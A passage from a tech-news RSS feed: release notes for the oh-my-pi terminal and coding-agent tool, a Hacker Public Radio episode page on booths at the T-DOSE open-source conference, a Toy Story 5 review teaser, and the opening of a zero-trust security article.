<li>Added markdown parsing for own-line display-math blocks (<code>$$...$$</code> and <code>\[...\]</code>) and delimiter-free <code>\begin{...}...\end{...}</code> math environments so block equations render via LaTeX-to-Unicode</li>
<li>Added stacked rendering of display-math fractions (<code>\frac</code>, <code>\dfrac</code>, <code>\cfrac</code>): the numerator is drawn over a horizontal bar over the denominator, with surrounding terms and <code>align</code>/<code>equation</code>-style environment rows aligned to the bar. Triggered for own-line <code>$$</code>/<code>\[</code> blocks, bare <code>\begin{...}</code> environments, and a paragraph whose sole content is a single display-math span; inline <code>$...$</code> fractions stay single-line (<code>½</code>, <code>(a+b)/c</code>)</li>
<li>Added bare math auto-rendering in <code>renderMathInText</code> for math-shaped lines and math environment blocks that omit <code>$</code>/<code>\(</code> delimiters</li>
<li>Added LaTeX-to-Unicode rendering for markdown math spans, converting <code>$$...$$</code>, <code>$...$</code>, <code>\(...\)</code>, and <code>\[...\]</code> into readable Unicode in Markdown output</li>
<li>Exported LaTeX conversion helpers from the package entrypoint so consumers can call <code>latexToUnicode</code>, <code>latexToBlock</code>, <code>renderMathInText</code>, <code>inlineMathSpanEnd</code>, and <code>isBareMathEnvironment</code> directly</li>
<li>Expanded LaTeX-to-Unicode conversion coverage for additional math fonts, delimiters, extensible arrows, layout environments, cancel/brace annotations, references, and AMS symbols</li>
<li>Added ANSI color rendering for LaTeX <code>\textcolor</code>, scoped <code>\color</code>, <code>\colorbox</code>, and <code>\fcolorbox</code>, including xcolor/CSS color parsing and truecolor/256-color terminal output</li>
<li>Added an optional <code>maxWidth</code> parameter to <code>MarkdownTheme.resolveMermaidAscii</code> to allow diagram resolvers to fit ASCII output to the available content width</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed markdown math rendering to preserve multiline layout for display equations, keeping <code>\\</code> row breaks as separate output lines (including inside list items)</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed <code>alignat</code>/<code>alignedat</code>/<code>gatheredat</code> rendering in <code>latexToBlock</code> so the required <code>{n}</code> preamble is not rendered as visible math content</li>
<li>Fixed math parsing to leave non-math LaTeX snippets (for example <code>\begin{itemize}</code>) and fenced code blocks as literal text instead of rendering them as math</li>
<li>Fixed <code>renderInlineMarkdown</code> to handle top-level display-math tokens so raw <code>$$...$$</code> delimiters are no longer leaked</li>
<li>Fixed inline math span detection so escaped dollars and currency-like patterns (such as <code>$5</code> and <code>$10</code>) are not converted as math</li>
<li>Fixed Mermaid diagram rendering in Markdown code blocks to clip each ASCII line to content width before wrapping, preventing preformatted diagram rows from fragmenting</li>
<li>Fixed fullscreen overlays losing keyboard focus to hidden prompt surfaces, which could make settings unresponsive while a background approval request was pending (<a href="https://github.com/can1357/oh-my-pi/issues/2789" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2789/hovercard">#2789</a>).</li>
<li>Fixed <code>bun test</code> runs inside a real terminal leaking TUI output: <code>ProcessTerminal</code> now honors a headless test-runtime default, so frame paints, <code>start()</code> capability probes (OSC 11 / DA1 / kitty), the progress keepalive, notifications, and teardown escapes no longer reach the developer's terminal, and stdin raw mode is never engaged. Previously <code>#safeWrite</code> only skipped on <code>!process.stdout.isTTY</code>, so a developer running the suite in an interactive terminal saw stray status/editor boxes and probe queries. Terminal-contract suites opt back into real I/O via <code>setTerminalHeadless(false)</code></li>
</ul>
<h2>@oh-my-pi/pi-utils</h2>
<h3>Added</h3>
<ul>
<li>Added <code>escapeXmlText</code> utility to escape XML-significant characters <code>&amp;</code>, <code>&lt;</code>, and <code>&gt;</code> in element body text</li>
<li>Added <code>isTerminalHeadless()</code> / <code>setTerminalHeadless()</code> to centrally suppress real-terminal side effects (stdout escape/frame writes, stdin raw mode, CSI/OSC capability probes, SIGWINCH, window-title changes, emergency restore) under the test runtime. Defaults on when <code>bun test</code> sets <code>NODE_ENV=test</code>; terminal-contract tests opt out via <code>setTerminalHeadless(false)</code></li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix(tui): keep overlay focus above hidden prompts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4676940403" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2795" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2795/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2795">#2795</a></li>
<li>fix(coding-agent): load discovered hook factories by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4677385980" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2798" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2798/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2798">#2798</a></li>
<li>fix(cli): skip empty session persistence by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4677808827" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2804" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2804/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2804">#2804</a></li>
<li>fix(coding-agent): prefer Codex default auth by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4678553738" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2810" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2810/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2810">#2810</a></li>
<li>fix(coding-agent): expand local auto-thinking classifier budget by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4678723092" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2814" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2814/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2814">#2814</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/can1357/oh-my-pi/compare/v16.0.2...v16.0.3"><tt>v16.0.2...v16.0.3</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4663: The hallway track at T-DOSE]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.
T-DOSE

TDOSE 2027


Mark you calendars #TDOSE 2027 on 5 and 6 June '27 in the Weeffabriek, Geldrop.




T-DOSE
Info Booth
Hackalot
Laptop Revive
Free Software Foundation Europe
Doeidag and Banray
Debian
Angry Nerds Podcast
Freie Software Freunde -...]]></description>
<link>https://tsecurity.de/de/3603360/podcasts/hpr4663-the-hallway-track-at-t-dose/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603360/podcasts/hpr4663-the-hallway-track-at-t-dose/</guid>
<pubDate>Wed, 17 Jun 2026 02:02:25 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>
<h1>T-DOSE</h1>

<h2>TDOSE 2027</h2>

<p>
Mark you calendars #TDOSE 2027 on 5 and 6 June '27 in the Weeffabriek, Geldrop.
</p>

<ul>

<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#TDOSE" rel="noopener noreferrer" target="_blank">T-DOSE</a></li>
<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#InfoBooth" rel="noopener noreferrer" target="_blank">Info Booth</a></li>
<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#Hackalot" rel="noopener noreferrer" target="_blank">Hackalot</a></li>
<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#LaptopRevive" rel="noopener noreferrer" target="_blank">Laptop Revive</a></li>
<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#FSFE" rel="noopener noreferrer" target="_blank">Free Software Foundation Europe</a></li>
<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#DoeidagBanray" rel="noopener noreferrer" target="_blank">Doeidag and Banray</a></li>
<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#Debian" rel="noopener noreferrer" target="_blank">Debian</a></li>
<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#AngryNerdsPodcast" rel="noopener noreferrer" target="_blank">Angry Nerds Podcast</a></li>
<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#FYMT" rel="noopener noreferrer" target="_blank">Freie Software Freunde - Free Your Model Train</a></li>
<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#HPR" rel="noopener noreferrer" target="_blank">Hacker Public Radio: The community Podcast</a></li>
<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#UBports" rel="noopener noreferrer" target="_blank">UBports</a></li>
<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#Adfinis" rel="noopener noreferrer" target="_blank">Adfinis</a></li>
<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#credit" rel="noopener noreferrer" target="_blank">Credits</a></li>
</ul>

<h2>The Technical Dutch Open Source Event (T-DOSE)</h2>
<p>
<audio controls="" preload="none">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.ogg#t=40.000000,283.720000" type="audio/ogg">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.mp3#t=40.000000,283.720000" type="audio/mpeg">
</audio>
</p>
<p>
In <a href="https://hackerpublicradio.org/eps/hpr4641/index.html" rel="noopener noreferrer" target="_blank">
hpr4641 :: Technical Dutch Open Source Event (T-DOSE)</a>
, Ken interviewed Peter van Ginneken about the <a href="https://t-dose.org/" rel="noopener noreferrer" target="_blank">
T-DOSE</a>
conference.</p>

<blockquote>
The Technical Dutch Open Source Event (T-DOSE) is a free conference to promote the use and development of Open Source software. This event has is organised yearly since 2006 in the Brainport region, near Eindhoven, The Netherlands. During this event, Open Source projects, developers and visitors can exchange ideas and knowledge.</blockquote>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_1.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_1_tn.jpeg">
</a>

</p>

<p>
Peter van Ginneken Opens the Event.</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_2.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_2_tn.jpeg">
</a>

</p>

<p>
We catch up with him at the start of Day 2.</p>

<h2>
Info Booth</h2>
<p>
<audio controls="" preload="none">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.ogg#t=283.720000,639.720000" type="audio/ogg">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.mp3#t=283.720000,639.720000" type="audio/mpeg">
</audio>
</p>

<p>
The backbone of any event is the Info booth and catering.</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_3.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_3_tn.jpeg">
</a>

</p>

<p>
Here we talk to Nick Hibma who when not serving on the Info Booth is treasurer of the T-DOSE organisation.</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_4.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_4_tn.jpeg">
</a>

</p>

<p>
Ready to serve sandwitches, sell T-Shirts, Magic Mugs, and <a href="https://www.club-mate.de/en/" rel="noopener noreferrer" target="_blank">
club-mate</a>

</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_5.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_5_tn.jpeg">
</a>

</p>

<p>
T-Shirts</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_6.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_6_tn.jpeg">
</a>

</p>

<p>

<a href="https://www.club-mate.de/en/" rel="noopener noreferrer" target="_blank">
club-mate</a>

</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_7.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_7_tn.jpeg">
</a>

</p>

<p>
Magic Mugs</p>

<h2>Hackalot</h2>
<p>
<audio controls="" preload="none">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.ogg#t=639.720000,1320.720000" type="audio/ogg">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.mp3#t=639.720000,1320.720000" type="audio/mpeg">
</audio>
</p>



<p>
Hackalot is the Eindhoven and surrounding area hackerspace. A hackerspace is a place where hackers can work on their own or collaborative projects. You can work and talk together, but you can also do your own thing. Together we can also purchase a lot of cooler tools such as lasercutters and 3d printers. Often there is no suitable place for equipment at home. So if you know someone, you are either an electronics/computer/technical hobby that got out of hand, come on by!</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_8.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_8_tn.jpeg">
</a>

</p>

<p>
Boekenwuurm at the Hackalot stand.</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_9.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_9_tn.jpeg">
</a>

</p>

<p>
The Hackalot stand.</p>

<ul>

<li>

<a href="https://hsnl.social/@boekenwuurm" rel="noopener noreferrer" target="_blank">
Boekenwuurm@hsnl.social</a>

</li>

<li>

<a href="https://boekenwuurm.nl/" rel="noopener noreferrer" target="_blank">
boekenwuurm.nl</a>

</li>

<li>

<a href="https://hackalot.nl/" rel="noopener noreferrer" target="_blank">
Hackalot</a>

</li>

</ul>

<h2>Laptop Revive</h2>
<p>
<audio controls="" preload="none">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.ogg#t=1320.720000,1824.720000" type="audio/ogg">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.mp3#t=1320.720000,1824.720000" type="audio/mpeg">
</audio>
</p>

<p>
Laptop Revive collects discarded laptops, that are still working. We then install Linux Mint to provide a working laptops to students who cannot afford laptops. We are socially involved, sustainable and open.</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_10.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_10_tn.jpeg">
</a>

</p>

<p>
Alex Kok Laptop Revive</p>

<ul>

<li>

<a href="https://www.laptoprevive.nl/" rel="noopener noreferrer" target="_blank">
Laptop Revive</a>

</li>

</ul>

<h2>Free Software Foundation Europe</h2>

<p>
Free Software Foundation Europe (FSFE) information booth, with information material, stickers and merchandise.</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_11.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_11_tn.jpeg">
</a>

</p>

<p>
Nico was so busy that we were unable to snag an interview this time. However check out our talk with him at the <a href="https://hackerpublicradio.org/eps/hpr4639/index.html" rel="noopener noreferrer" target="_blank">
NLUUG Spring Conference 2026</a>
.</p>

<ul>

<li>

<a href="https://fsfe.org/index.en.html" rel="noopener noreferrer" target="_blank">
Free Software Foundation Europe</a>

</li>

</ul>

<h2>Doeidag and Banray</h2>
<p>
<audio controls="" preload="none">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.ogg#t=1824.720000,2330.720000" type="audio/ogg">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.mp3#t=1824.720000,2330.720000" type="audio/mpeg">
</audio>
</p>

<p>
We also interviewed Geert-Jan Meewisse in <a href="https://hackerpublicradio.org/eps/hpr4639/index.html" rel="noopener noreferrer" target="_blank">
hpr4639 :: NLUUG Spring Conference 2026</a>
but this time he is here talking about <a href="https://banray.eu/en/index.html" rel="noopener noreferrer" target="_blank">
banray.eu</a>

</p>

<blockquote>
In 2025, Meta sold over seven million pairs of camera-equipped glasses that look like regular Ray-Bans. The person wearing them looks like anyone else. But these people are now products, as is everyone they interact with.</blockquote>

<p>
He then also mentioned the <a href="https://doeidag.nl/" rel="noopener noreferrer" target="_blank">
Doeidag</a>
project where they encourage people to drop one service at a time on the first Sunday of the month</p>

<ul>

<li>

<a href="https://doeidag.nl/" rel="noopener noreferrer" target="_blank">
https://doeidag.nl/</a>

</li>

<li>

<a href="https://banray.eu/en/index.html" rel="noopener noreferrer" target="_blank">
https://banray.eu/</a>

</li>

</ul>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_12.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_12_tn.jpeg">
</a>

</p>

<p>
Geert-Jan Meewisse Doeidag and Banray</p>

<h2>Debian</h2>
<p>
<audio controls="" preload="none">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.ogg#t=2330.720000,2660.720000" type="audio/ogg">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.mp3#t=2330.720000,2660.720000" type="audio/mpeg">
</audio>
</p>

<p>
The Debian Project is an association of Free Software developers who volunteer their time and effort in order to produce the completely free operating system Debian.</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_13.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_13_tn.jpeg">
</a>

</p>

<p>
Ken Talks to Joost van Baal Llić from the Debian Project</p>

<p>

<a href="https://www.debian.org/" rel="noopener noreferrer" target="_blank">
Debian</a>

</p>

<h2>Angry Nerds Podcast</h2>

<p>
Angry Nerds, met extra cyber!</p>

<p>
The Angry Nerds is a Dutch Language podcast about privacy and security</p>

<p>
It's a live show that is topical and often humorous tech podcast where a group of enthusiastic nerds discusses current technology, IT and cybersecurity topics. The hosts combine technical depth with background conversations, humor and the occasionally a good dose of cynicism. Expect conversations about everything from network infrastructures to software development, from privacy issues to bizarre tech trends.</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_14.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_14_tn.jpeg">
</a>

</p>

<p>
Ken on the Angry Nerds Podcast</p>

<p>You can listen to the recording at <a href="https://makertube.net/w/6M6VumLCH99mN3y1dZjRz9?start=1h16m11s">Angry Nerds op T-DOSE 2026 deel 2 (prikkelarme versie)</a>.</p>

<ul>

<li>

<a href="https://angrynerdspodcast.nl/" rel="noopener noreferrer" target="_blank">
Angry Nerds Podcast</a>

</li>

</ul>

<h2>Freie Software Freunde - Free Your Model Train</h2>
<p>
<audio controls="" preload="none">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.ogg#t=2660.720000,3279.720000" type="audio/ogg">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.mp3#t=2660.720000,3279.720000" type="audio/mpeg">
</audio>
</p>

<p>
We are a non-profit organization. We are committed to Free Software and Open Standards. Software is not just technology, it's an important part of our daily life.</p>

<p>
We want to raise awareness of the importance of Free Software and Open Standards. That is why we are concerned with topics outside of technology: politics, education, ethics, psychology, ecology and economics, licenses, ... One of our projects is "Free your model train". Our goal is to raise awareness of the benefits of open standards.</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_15.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_15_tn.jpeg">
</a>

</p>

<p>
Birgit Hücking (@akkolady) standing at the <a href="http://freie-software.org/" rel="noopener noreferrer" target="_blank">
freie-software.org</a>

</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_16.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_16_tn.jpeg">
</a>

</p>

<p>
The <a href="http://freie-software.org/" rel="noopener noreferrer" target="_blank">
freie-software.org</a>
table with two large train loops, a smaller internal one. Two knitted Tux Mascots. And a lot of information.</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_17.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_17_tn.jpeg">
</a>
Close up of the two knitted Tux Mascot.</p>

<ul>
<li><a href="https://chaos.social/@akkolady" rel="noopener noreferrer" target="_blank">@akkolady@chaos.social</a></li>
<li><a href="https://mastodon.social/@FreieSoftwareFreunde" rel="noopener noreferrer" target="_blank">@FreieSoftwareFreunde@mastodon.social</a></li>
<li><a href="https://freie-software.org/" rel="noopener noreferrer" target="_blank">Freie Software Freunde</a></li>
<li><a href="https://freie-software.org/?Projekte___Free_Your_Model_Train" rel="noopener noreferrer" target="_blank">Free Your Model Train</a></li>
<li><a href="https://fymt.de/" rel="noopener noreferrer" target="_blank">https://fymt.de</a></li>

</ul>

<h2>Hacker Public Radio: The community Podcast</h2>

<blockquote>
Hacker Public Radio is a technology focused podcast that releases shows every weekday Monday to Friday. Our shows are created by people like you, and can be on any topic that is of interest to hackers, hobbyists, makers, etc. We are a welcoming community that offers positive feedback and encourages respectful debate. This is our 21st year of operation, and we will release our 5,000th show in August. Everything we do is released under a Free Culture License. We do not vet, edit, moderate or in any way censor any of the audio you submit, we trust you to do that. We will be available to guide you in sharing your knowledge with the community. Having had a stand at FOSDEM (BE), OggCamp(UK), Linux Fest North West(US), Spectrum (FR), we are available to show you how easy podcasting can be. We will be answering your questions, and conducting interviews with anyone with anything interesting to say.</blockquote>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_18.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_18_tn.jpeg">
</a>

</p>

<p>
The HPR booth.</p>

<ul>

<li>

<a href="https://hackerpublicradio.org/" rel="noopener noreferrer" target="_blank">
Hacker Public Radio</a>

</li>

</ul>

<h2>UBports</h2>
<p>
<audio controls="" preload="none">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.ogg#t=3279.720000,4060.720000" type="audio/ogg">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.mp3#t=3279.720000,4060.720000" type="audio/mpeg">
</audio>
</p>

<blockquote>
We are developing an open source Linux mobile OS built to be your daily driver... ...and we'd like to welcome you to our community.</blockquote>

<p>
Next up is a chat with Sander Klootwijk about UBports and Ubuntu Touch. Their website has a list of <a href="https://devices.ubuntu-touch.io/" rel="noopener noreferrer" target="_blank">
supported devices</a>
.</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_19.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_19_tn.jpeg">
</a>

</p>

<p>
We talk with Sander Klootwijk</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_20.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_20_tn.jpeg">
</a>

</p>

<p>
Proof it's running on actual hardware</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_21.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_21_tn.jpeg">
</a>

</p>

<p>
Yumi The UBports Installer Mascot was not available for comment.</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_22.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_22_tn.jpeg">
</a>

</p>

<p>
Ubuntu Touch on a Fairphone</p>

<ul>

<li>

<a href="https://mastodon.social/@BallonQuartier@mastodon.nl" rel="noopener noreferrer" target="_blank">
@BallonQuartier@mastodon.nl</a>

</li>

<li>

<a href="https://ubports.com/en/" rel="noopener noreferrer" target="_blank">
UBports</a>

</li>

<li>

<a href="https://devices.ubuntu-touch.io/" rel="noopener noreferrer" target="_blank">
https://devices.ubuntu-touch.io/</a>

</li>

</ul>

<h2>Adfinis</h2>
<p>
<audio controls="" preload="none">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.ogg#t=4060.720000,4688.720000" type="audio/ogg">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.mp3#t=4060.720000,4688.720000" type="audio/mpeg">
</audio>
</p>

<blockquote>
Accelerate your business with open source-driven automation, security, cloud, and DevSecOps solutions from Adfinis, your end-to-end partner for robust, flexible IT that drives growth and innovation at any scale. Welcome to Our World Full of Open Source</blockquote>

<blockquote>
At Adfinis, we believe in the transformative power of open source technology to foster innovation, transparency, and collaboration. We are committed to providing solutions free from vendor lock-in, ensuring our clients retain full control and flexibility over their systems. Digital sustainability lies at the heart of our approach, as we strive to create technologies that not only serve the present but also support a long-term, environmentally responsible future. Additionally, we champion digital sovereignty, empowering organizations and communities to own and control their data, infrastructure, and technological destiny. These principles drive us to build a more open, sustainable, and inclusive digital world.</blockquote>

<p>
Finally we chat to <a href="mailto:Coen.hamers@adfinis.com" rel="noopener noreferrer" target="_blank">
Coen hamers</a>
, <a href="mailto:Robert.debock@adfinis.com" rel="noopener noreferrer" target="_blank">
Robert de Bock</a>
, and <a href="mailto:annebelle.vanwaardenburg@adfinis.com" rel="noopener noreferrer" target="_blank">
Annebelle van Waardenburg</a>
from <a href="https://www.adfinis.com/" rel="noopener noreferrer" target="_blank">
Adfinis</a>
whose sponsorship made the event possible.</p>
<p>
</p><ul>
<li><a href="https://www.adfinis.com/en/solutions" rel="noopener noreferrer" target="_blank">https://www.adfinis.com/en/solutions</a></li>
<li><a href="https://www.adfinis.com/en/career" rel="noopener noreferrer" target="_blank">https://www.adfinis.com/en/career</a></li>
</ul>


<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_23.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_23_tn.jpeg">
</a>

</p>

<h2>Credits</h2>

<ul>
<li><a href="https://freesound.org/people/jzielke011/sounds/439690/">Record Needle Rip</a></li>
<li><a href="https://archive.org/details/FreeSoftwareSong_131">Free Software Song</a></li>
</ul>


<p><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I watched Toy Story 5 in Dolby Atmos and Dolby Vision — and the new Pixar movie is a few Lightyears away from the Disney film series' best entries]]></title>
<description><![CDATA[The latest entry in Pixar's money-making animated movie series isn't terrible, but it fails to recapture the magic of the original trilogy.]]></description>
<link>https://tsecurity.de/de/3602504/it-nachrichten/i-watched-toy-story-5-in-dolby-atmos-and-dolby-vision-and-the-new-pixar-movie-is-a-few-lightyears-away-from-the-disney-film-series-best-entries/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3602504/it-nachrichten/i-watched-toy-story-5-in-dolby-atmos-and-dolby-vision-and-the-new-pixar-movie-is-a-few-lightyears-away-from-the-disney-film-series-best-entries/</guid>
<pubDate>Tue, 16 Jun 2026 18:17:02 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The latest entry in Pixar's money-making animated movie series isn't terrible, but it fails to recapture the magic of the original trilogy.]]></content:encoded>
</item>
<item>
<title><![CDATA[Zero trust isn’t broken. Most companies just do it wrong.]]></title>
<description><![CDATA[Zero trust is 15 years old, and like many teenagers, it can feel misunderstood and underappreciated.



The concept of zero trust was first defined by John Kindervag, a Forrester analyst at the time, as a strategy to replace the outmoded perimeter security model with a “never trust, always verify...]]></description>
<link>https://tsecurity.de/de/3601184/it-security-nachrichten/zero-trust-isnt-broken-most-companies-just-do-it-wrong/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3601184/it-security-nachrichten/zero-trust-isnt-broken-most-companies-just-do-it-wrong/</guid>
<pubDate>Tue, 16 Jun 2026 11:08:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Zero trust is 15 years old, and like many teenagers, it can feel misunderstood and underappreciated.</p>



<p>The concept of zero trust was first defined by <a href="https://www.linkedin.com/in/john-kindervag-40572b1/">John Kindervag</a>, a Forrester analyst at the time, as a strategy to replace the outmoded perimeter security model with a “never trust, always verify” approach. But going from principle to practice isn’t easy.</p>



